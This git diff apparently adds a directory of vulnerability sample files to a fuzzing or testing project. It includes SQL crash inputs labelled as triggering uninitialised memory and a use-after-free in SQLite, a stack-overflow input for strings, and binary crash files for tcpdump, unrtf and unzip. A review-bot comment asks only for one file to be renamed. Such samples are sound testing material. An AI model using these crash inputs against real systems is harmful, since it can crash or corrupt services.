diff --git a/docs/vuln_samples/sqlite-unint-mem.sql b/docs/vuln_samples/sqlite-unint-mem.sql
new file mode 100644
index 00000000..83b77112
--- /dev/null
+++ b/docs/vuln_samples/sqlite-unint-mem.sql
@@ -0,0 +1 @@
+REATE VIRTUAL TABLE t0 USING fts4(prefix=0);INSERT INTO t0 VALUES(0);
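Review bot: The file name `sqlite-unint-mem.sql` breaks the `-uninit-mem` spelling used by `bash-uninit-mem.var` and the `libtiff-uninit-mem*.tif` samples added in the same commit, so a search of the directory by bug class would miss it; `sqlite-uninit-mem.sql` would be consistent. The statement opens with `REATE` rather than `CREATE`, which looks like a fuzzer-minimised input rather than a typo, so the file content should stay byte-for-byte as committed and only the name should change.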
diff --git a/docs/vuln_samples/sqlite-use-after-free.sql b/docs/vuln_samples/sqlite-use-after-free.sql
new file mode 100644
index 00000000..4083ee64
--- /dev/null
+++ b/docs/vuln_samples/sqlite-use-after-free.sql
@@ -0,0 +1 @@
+create table t(s);PRAGMA writable_schema=ON;UPDATE sqlite_master SET sql='ANALYZE;CREATE VIRTUAL TABLE t USING fts3;DROP TABLE t;DROP TABLE EXISTS t';PRAGMA r;SAVEPOINT T;ANALYZE;ROLLBACK;SAVEPOINT E;DROP TABLE IF EXISTS t;
diff --git a/docs/vuln_samples/strings-bfd-badptr.elf b/docs/vuln_samples/strings-bfd-badptr.elf
new file mode 100644
index 00000000..1df629b6
Binary files /dev/null and b/docs/vuln_samples/strings-bfd-badptr.elf differ
diff --git a/docs/vuln_samples/strings-bfd-badptr2.elf b/docs/vuln_samples/strings-bfd-badptr2.elf
new file mode 100644
index 00000000..085d3c11
Binary files /dev/null and b/docs/vuln_samples/strings-bfd-badptr2.elf differ
diff --git a/docs/vuln_samples/strings-stack-overflow b/docs/vuln_samples/strings-stack-overflow
new file mode 100644
index 00000000..a673b273
--- /dev/null
+++ b/docs/vuln_samples/strings-stack-overflow
@@ -0,0 +1,3 @@
+$$@$$$@$o
+S…Ôo
+S…Ô
\ No newline at end of file
diff --git a/docs/vuln_samples/strings-unchecked-ctr.elf b/docs/vuln_samples/strings-unchecked-ctr.elf
new file mode 100644
index 00000000..dc531d5c
Binary files /dev/null and b/docs/vuln_samples/strings-unchecked-ctr.elf differ
diff --git a/docs/vuln_samples/tcpdump-arp-crash.pcap b/docs/vuln_samples/tcpdump-arp-crash.pcap
new file mode 100644
index 00000000..40d199a2
Binary files /dev/null and b/docs/vuln_samples/tcpdump-arp-crash.pcap differ
diff --git a/docs/vuln_samples/tcpdump-ppp-crash.pcap b/docs/vuln_samples/tcpdump-ppp-crash.pcap
new file mode 100644
index 00000000..b6831155
Binary files /dev/null and b/docs/vuln_samples/tcpdump-ppp-crash.pcap differ
diff --git a/docs/vuln_samples/unrtf-arbitrary-read.rtf b/docs/vuln_samples/unrtf-arbitrary-read.rtf
new file mode 100644
index 00000000..b7f4c283
Binary files /dev/null and b/docs/vuln_samples/unrtf-arbitrary-read.rtf differ
diff --git a/docs/vuln_samples/unzip-t-mem-corruption.zip b/docs/vuln_samples/unzip-t-mem-corruption.zip
new file mode 100644
index 00000000..d34fa39e
Binary files /dev/null and b/docs/vuln_samples/unzip-t-mem-corruption.zip differ
-- cgit 1.4.1